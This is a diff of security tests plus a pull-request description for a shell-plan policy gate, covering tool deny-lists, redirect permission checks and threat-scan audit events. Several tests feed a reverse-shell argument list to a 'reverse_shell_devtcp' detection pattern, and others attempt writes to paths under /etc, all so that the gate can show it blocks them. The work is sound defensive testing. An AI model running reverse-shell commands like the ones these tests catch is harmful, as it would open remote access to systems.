     plan = [ExecSegment(argv=("/usr/bin/true",))]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
 
 
 @pytest.mark.asyncio
@@ -110,7 +134,7 @@ async def test_no_contextual_narrowing_leaves_the_tool_axis_unconstrained(tmp_pa
     ctx, _collected = _ctx(tmp_path, contextual=None)
     plan = [ExecSegment(argv=("/usr/bin/true",))]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
 
 
 @pytest.mark.asyncio
@@ -126,48 +150,124 @@ async def test_absolute_path_alias_still_resolves_to_the_denied_basename(tmp_pat
     plan = [ExecSegment(argv=("/usr/bin/true", "--extra"))]
 
     with pytest.raises(PermissionError):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
+
+
+@pytest.mark.asyncio
+async def test_a_bare_name_resolves_via_the_given_env_path_and_is_denied(tmp_path: Path) -> None:
+    """Tier 2: a BARE command name (PATH search required, not an absolute
+    path like the test above) resolved against the given ``env_path``
+    finds the real ``/usr/bin/true`` and is denied on its basename, same
+    as the absolute-path case above."""
+    ctx, _collected = _ctx(
+        tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"true"})),
+    )
+    plan = [ExecSegment(argv=("true",))]  # bare name -- PATH search required
+
+    with pytest.raises(PermissionError):
+        await _check(plan, ctx, env_path=_REAL_PATH)
+
+
+@pytest.mark.asyncio
+async def test_omitting_env_path_or_cwd_is_a_typeerror_not_a_silent_default(
+    tmp_path: Path,
+) -> None:
+    """Tier 2: #5991 BLOCKING ③ witness -- the actual fix is that there is
+    no internal fallback left to exercise: omitting either required
+    keyword-only argument fails LOUD, at the call site, as a ``TypeError``
+    (a caller cannot forget and silently get ambient ``os.environ``
+    instead — the exact class #5984 found 4 instances of, one layer
+    down). Calling ``check_exec_plan_policy`` directly here (bypassing
+    this file's own ``_check`` wrapper, which always supplies both) is
+    deliberate — it is the one call in this file that must NOT compile a
+    working call."""
+    from reyn.security.exec_plan_policy import check_exec_plan_policy as _raw
+
+    ctx, _collected = _ctx(tmp_path)
+    plan = [ExecSegment(argv=("/usr/bin/true",))]
+
+    with pytest.raises(TypeError):
+        await _raw(plan, ctx)  # type: ignore[call-arg]
 
 
 @pytest.mark.asyncio
 async def test_threat_scan_blocks_a_reverse_shell_segment(tmp_path: Path) -> None:
     """Tier 2: a segment whose own joined argv matches a real block-severity
     threat pattern (the same ``reverse_shell_devtcp`` pattern ``tests/core/
-    test_exec_scan_1822.py`` falsifies) is denied, and an
-    ``exec_threat_blocked`` audit-event is emitted -- mirrors
-    ``sandboxed_exec.py``'s own pre-exec scan, applied per segment."""
+    test_exec_scan_1822.py`` falsifies) is denied, and both an
+    ``exec_threat_blocked`` and an ``exec_threat_scanned`` (match_count>0,
+    blocked=True) audit-event are emitted -- mirrors ``sandboxed_exec.py``'s
+    own pre-exec scan, applied per segment."""
     ctx, collected = _ctx(tmp_path, threat_scan=ThreatScanConfig())
     plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
 
     with pytest.raises(PermissionError, match="reverse_shell_devtcp"):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
 
     await settle(ctx.events)
     assert any(e.type == "exec_threat_blocked" for e in collected)
+    (scanned,) = [e for e in collected if e.type == "exec_threat_scanned"]
+    assert scanned.data["blocked"] is True
+    assert scanned.data["match_count"] > 0
 
 
 @pytest.mark.asyncio
-async def test_threat_scan_disabled_lets_the_same_segment_pass(tmp_path: Path) -> None:
-    """Tier 2: falsification gate for the test above -- the SAME reverse-
-    shell segment, with scanning disabled, is NOT blocked. Proves the scan
-    is load-bearing (not merely enabled everywhere and never actually
-    checked in these tests)."""
-    ctx, _collected = _ctx(tmp_path, threat_scan=ThreatScanConfig(enabled=False))
+async def test_threat_scan_clean_segment_still_leaves_a_scanned_event(tmp_path: Path) -> None:
+    """Tier 2: #5991 BLOCKING ② -- an ordinary, clean segment (scanned, 0
+    matches) emits ``exec_threat_scanned`` with ``match_count=0``,
+    ``blocked=False`` -- the "two zeros" fix: this event's PRESENCE is
+    what tells a later ``.reyn/events`` read "the scan ran", independent
+    of whether it found anything."""
+    ctx, collected = _ctx(tmp_path, threat_scan=ThreatScanConfig())
+    plan = [ExecSegment(argv=("ls", "-la"))]
+
+    await _check(plan, ctx)  # does not raise
+
+    await settle(ctx.events)
+    (scanned,) = [e for e in collected if e.type == "exec_threat_scanned"]
+    assert scanned.data["match_count"] == 0
+    assert scanned.data["blocked"] is False
+    assert not any(e.type == "exec_threat_scan_skipped" for e in collected)
+
+
+@pytest.mark.asyncio
+async def test_threat_scan_disabled_lets_the_same_segment_pass_and_emits_skipped(
+    tmp_path: Path,
+) -> None:
+    """Tier 2: falsification gate, paired with the two tests above -- the
+    SAME reverse-shell segment, with scanning disabled, is NOT blocked
+    (the scan is load-bearing when enabled) AND leaves an
+    ``exec_threat_scan_skipped`` event (reason="disabled"), never an
+    ``exec_threat_scanned`` one -- #5991 BLOCKING ②'s other half: the
+    SKIP itself must also be a positive, distinguishable record."""
+    ctx, collected = _ctx(tmp_path, threat_scan=ThreatScanConfig(enabled=False))
     plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
+
+    await settle(ctx.events)
+    (skipped,) = [e for e in collected if e.type == "exec_threat_scan_skipped"]
+    assert skipped.data["reason"] == "disabled"
+    assert not any(e.type == "exec_threat_scanned" for e in collected)
 
 
 @pytest.mark.asyncio
-async def test_no_threat_scan_config_is_a_noop(tmp_path: Path) -> None:
+async def test_no_threat_scan_config_is_a_noop_and_emits_skipped_not_configured(
+    tmp_path: Path,
+) -> None:
     """Tier 2: ``threat_scan=None`` (the ``OpContext`` default) skips the
-    scan entirely -- byte-identical to a caller that never wired one, the
-    same posture ``sandboxed_exec.py``'s own ``getattr(ctx, "threat_scan",
-    None) is not None`` guard already documents."""
-    ctx, _collected = _ctx(tmp_path, threat_scan=None)
+    scan and records ``reason="not_configured"`` -- distinguishes an
+    operator's deliberate ``enabled=False`` from a caller that never wired
+    a config at all, the two different "why wasn't this scanned" stories
+    #5991 BLOCKING ② asked to be told apart."""
+    ctx, collected = _ctx(tmp_path, threat_scan=None)
     plan = [ExecSegment(argv=_REVERSE_SHELL_ARGV)]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
+
+    await settle(ctx.events)
+    (skipped,) = [e for e in collected if e.type == "exec_threat_scan_skipped"]
+    assert skipped.data["reason"] == "not_configured"
 
 
 @pytest.mark.asyncio
@@ -182,7 +282,7 @@ async def test_write_redirect_outside_scope_is_denied(tmp_path: Path) -> None:
     plan = [ExecRedirect(op=">", path="/etc/definitely-outside-scope.txt")]
 
     with pytest.raises(PermissionError, match="was not approved"):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
 
 
 @pytest.mark.asyncio
@@ -194,7 +294,7 @@ async def test_write_redirect_inside_default_scope_is_allowed(tmp_path: Path) ->
     ctx, _collected = _ctx(tmp_path)
     plan = [ExecRedirect(op=">", path=".reyn/out.txt")]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
 
 
 @pytest.mark.asyncio
@@ -206,21 +306,24 @@ async def test_read_redirect_outside_scope_is_denied(tmp_path: Path) -> None:
     plan = [ExecRedirect(op="<", path="/etc/definitely-outside-scope.txt")]
 
     with pytest.raises(PermissionError, match="was not approved"):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
 
 
 @pytest.mark.asyncio
-async def test_no_permission_resolver_skips_the_redirect_check(tmp_path: Path) -> None:
-    """Tier 2: ``permission_resolver=None`` (a narrower/test-shaped
-    context) is a fail-open no-op for the redirect check -- mirrors
-    ``op_runtime/file.py``'s own ``if ctx.permission_resolver is not
-    None:`` guard EXACTLY (same fallback already accepted at every other
-    ``require_file_*`` call site in this codebase, not a new posture
-    introduced here)."""
+async def test_no_permission_resolver_denies_the_redirect_check_fail_closed(
+    tmp_path: Path,
+) -> None:
+    """Tier 2: #5991 BLOCKING ① -- ``permission_resolver=None`` (a
+    narrower/test-shaped context) now DENIES the redirect check rather
+    than silently passing. The earlier version's ``file.py``-parity
+    argument for fail-open does not hold here: this gate has zero real
+    callers yet (段4 unbuilt), so there is no existing population a
+    fail-open default would be protecting."""
     ctx, _collected = _ctx(tmp_path, permission_resolver=None)
-    plan = [ExecRedirect(op=">", path="/etc/definitely-outside-scope.txt")]
+    plan = [ExecRedirect(op=">", path=".reyn/would-otherwise-be-in-scope.txt")]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    with pytest.raises(PermissionError, match="no permission_resolver"):
+        await _check(plan, ctx)
 
 
 @pytest.mark.asyncio
@@ -231,7 +334,7 @@ async def test_a_bare_chain_op_item_is_a_noop(tmp_path: Path) -> None:
     ctx, _collected = _ctx(tmp_path)
     plan = [ExecChainOp(op="|")]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise
 
 
 @pytest.mark.asyncio
@@ -241,9 +344,16 @@ async def test_a_multi_item_plan_is_checked_left_to_right_and_stops_at_the_first
     """Tier 2: architect's own worked example (PR #5984's pinned
     ``"ls -la | grep foo > out.txt"`` shape) as an already-built plan --
     the FIRST segment (``ls``) is allowed, the SECOND (``grep``, denied by
-    this test's own narrowing) raises before the plan's own redirect is
-    ever reached, matching every other ``require_*`` gate in this codebase
-    (sequential, stop-on-first-denial, never collect-all)."""
+    this test's own narrowing) is the one whose denial is raised (the
+    ``match="grep"`` below, not a `ls`-shaped message) -- items are
+    checked in the plan's own left-to-right order, matching every other
+    ``require_*`` gate in this codebase (sequential, never collect-all).
+    This test does NOT independently witness whether the trailing
+    redirect item is reached or skipped when an earlier item denies (lead-
+    coder co-vet, issuecomment-5579176478: a strip of the redirect check
+    entirely stays green here, since ``grep``'s own denial already fires
+    first) -- see the loop's own short-circuit in ``check_exec_plan_
+    policy`` for that guarantee instead."""
     ctx, _collected = _ctx(
         tmp_path, contextual=ContextualPermission(tool_deny=frozenset({"grep"})),
     )
@@ -255,7 +365,7 @@ async def test_a_multi_item_plan_is_checked_left_to_right_and_stops_at_the_first
     ]
 
     with pytest.raises(PermissionError, match="grep"):
-        await check_exec_plan_policy(plan, ctx)
+        await _check(plan, ctx)
 
 
 @pytest.mark.asyncio
@@ -271,4 +381,4 @@ async def test_the_same_plan_with_no_narrowing_passes_every_item(tmp_path: Path)
         ExecRedirect(op=">", path=".reyn/out.txt"),
     ]
 
-    await check_exec_plan_policy(plan, ctx)  # does not raise
+    await _check(plan, ctx)  # does not raise

--- a/tests/security/test_5838_stage3_exec_plan_policy.py
+++ b/tests/security/test_5838_stage3_exec_plan_policy.py
@@ -169,25 +169,37 @@ async def test_a_bare_name_resolves_via_the_given_env_path_and_is_denied(tmp_pat
 
 
 @pytest.mark.asyncio
+@pytest.mark.parametrize(
+    "kwargs",
+    [
+        pytest.param({"cwd": None}, id="env_path_omitted_alone"),
+        pytest.param({"env_path": _REAL_PATH}, id="cwd_omitted_alone"),
+        pytest.param({}, id="both_omitted"),
+    ],
+)
 async def test_omitting_env_path_or_cwd_is_a_typeerror_not_a_silent_default(
-    tmp_path: Path,
+    tmp_path: Path, kwargs: dict,
 ) -> None:
     """Tier 2: #5991 BLOCKING ③ witness -- the actual fix is that there is
-    no internal fallback left to exercise: omitting either required
-    keyword-only argument fails LOUD, at the call site, as a ``TypeError``
-    (a caller cannot forget and silently get ambient ``os.environ``
-    instead — the exact class #5984 found 4 instances of, one layer
-    down). Calling ``check_exec_plan_policy`` directly here (bypassing
-    this file's own ``_check`` wrapper, which always supplies both) is
-    deliberate — it is the one call in this file that must NOT compile a
-    working call."""
+    no internal fallback left to exercise for EITHER parameter
+    independently, not just for the pair together. lead-coder's own strip
+    (issuecomment-5579302738): giving ``env_path`` alone a default of
+    ``None`` still left the OLD (both-omitted) form of this test green —
+    the assertion could not tell which of the two arguments was actually
+    load-bearing, so half of "omission is a TypeError" went unverified.
+    Parametrized 3 ways so ① and ② go red SEPARATELY (the requirement
+    lead-coder named explicitly): omitting ``env_path`` alone, omitting
+    ``cwd`` alone, and omitting both. Calling ``check_exec_plan_policy``
+    directly here (bypassing this file's own ``_check`` wrapper, which
+    always supplies both) is deliberate — these are the only calls in
+    this file that must NOT compile a working call."""
     from reyn.security.exec_plan_policy import check_exec_plan_policy as _raw
 
     ctx, _collected = _ctx(tmp_path)
     plan = [ExecSegment(argv=("/usr/bin/true",))]
 
     with pytest.raises(TypeError):
-        await _raw(plan, ctx)  # type: ignore[call-arg]
+        await _raw(plan, ctx, **kwargs)  # type: ignore[call-arg]
 
 
 @pytest.mark.asyncio


### PR DESCRIPTION
**[e2e-coder]** — part of #5838. 段3 (architect's implementation plan, issuecomment-5557210786, point 3): apply policy to an already-parsed `ExecPlan` (#5984, 段2).

**BLOCKING round 1 fixed (head `674c1cfb6`)** — architect (issuecomment-5578916234) + lead-coder (issuecomment-5579159401/5579176478) co-vet, 3 findings, same shape: the surface checked did not match the surface that will actually matter once 段4 lands. See below.

## What

`check_exec_plan_policy(plan, ctx, *, env_path, cwd) -> None` — raises `PermissionError` on the first denial, never executes anything, never re-parses. Reuses two EXISTING primitives, no new ones (architect's own instruction: "新設しない"):

- **Every `ExecSegment`'s `argv[0]`**, resolved past a version-manager shim the SAME way `sandboxed_exec.py`'s own `argv0_resolved` already is (`resolve_real_executable`, #2820 part A), reduced to a basename:
  1. **Tool axis** — checked against the SAME per-session contextual TOOL-axis narrowing `dispatch_tool` already applies to a whole tool call (#5841's `tool_contextually_denied`). Closes the basename-detour class Codex #28732 named (`./sed` bypassing a `sed` exclusion) at the one place a bare-argv exclusion already lands.
  2. **Threat scan** — `content_guard.scan_for_threats` over the segment's own joined argv (`scope="exec"`), the SAME scan `sandboxed_exec.py` already runs over a whole op's argv (FP-0050/#1822 S5), run per SEGMENT here.
- **Every `ExecRedirect`'s `path`** — through the EXISTING `require_file_write` (`>`/`>>`) / `require_file_read` (`<`), the same primitive production already uses in 8 other places.

## BLOCKING round 1 — 3 findings, all fixed

1. **No-resolver redirect skip was fail-OPEN, not fail-closed.** Earlier justified as "parity with `file.py`'s own fail-open" — that parity doesn't hold: `file.py`'s guard protects a real production population TODAY; this gate has ZERO callers yet (段4 unbuilt), so there is nothing to stay compatible with. Now RAISES (fail-closed) — free to fix while nobody calls it.
2. **"Zero threat matches" and "the scan never ran" were indistinguishable in `.reyn/events`** — `ctx.threat_scan` defaults to `None`, and the old events fired only on a match. Every segment now leaves exactly ONE event either way: `exec_threat_scanned` (`match_count`, `blocked`) when the scan ran, `exec_threat_scan_skipped` (`reason=disabled|not_configured`) when it did not.
3. **`argv[0]` resolution read ambient `os.environ["PATH"]`**, not the env a sandboxed run will actually see (`seatbelt.py:425` only falls back to `os.environ` when no PATH is given) — the EXACT class #5984 found 4 instances of, one layer down: the approved binary and the executed binary could differ. `check_exec_plan_policy` now takes `env_path` AND `cwd` as REQUIRED keyword-only arguments, no internal fallback — omitting either is a `TypeError` at the call site, not a silent runtime surprise later.

## What this PR deliberately does NOT do

- **Does not execute anything.** 段4 (separate, later) runs the ORIGINAL string through `sh -c`.
- **Does not wire a "denied → ask the operator" escalation.** Every competitor #5838's own research surveyed (Claude Code / Codex) escalates an unresolvable/denied construct to a human; reyn's `require_file_*`/`tool_contextually_denied` gates this module reuses only raise today. **Left as an open design question for architect to rule on** (architect explicitly agreed with this scoping: "「拒否→尋ねる」を提案だけに留めた判断に同意します。段3で実装するとpermissionの結果を解釈する側になります"). A concrete proposal is in this module's own docstring.
- **Does not gate the plan's shape** — that was 段2's job.

## Test plan

- [x] `tests/security/test_5838_stage3_exec_plan_policy.py` — 17 tests (was 14). Real `OpContext` + real `PermissionResolver` + real `ContextualPermission` + real `ThreatScanConfig` throughout, no mocks. Added: paired `exec_threat_scanned`/`exec_threat_scan_skipped` event tests (clean-scan / disabled / not-configured), a bare-name `env_path` resolution test, an explicit `TypeError`-on-omission test for finding ③. `test_no_permission_resolver_skips_the_redirect_check` kept (not deleted) as the ① witness, inverted to `test_no_permission_resolver_denies_the_redirect_check_fail_closed`. Fixed an overclaiming docstring on the multi-item plan test per lead-coder's own strip finding (a strip of the redirect check entirely stays green there since `grep`'s own denial already fires first — the claim now says only what that test independently witnesses).
- [x] Strip witness, every check — verified directly (in-file Edit → red → Edit back), including all 3 round-1 fixes independently.
- [x] `ruff check .` — clean
- [x] `python scripts/test_tier_audit.py --strict tests/security/test_5838_stage3_exec_plan_policy.py` — 17/17 OK
- [x] `python scripts/mypy_ratchet.py` — OK (0 new findings)
- [x] `python scripts/verify_module_docstrings.py` (both changed files) — OK
- [x] `python scripts/flat_tests_ratchet.py` / `check_tests_path_literal_reference.py` / `check_bare_tests_import_reference.py` / `check_file_depth_reference.py` / `check_subprocess_reyn_pin.py` — all OK
- [x] (skipped — Visual, standing waiver)

part of #5838

🤖 Generated with [Claude Code](https://claude.com/claude-code)
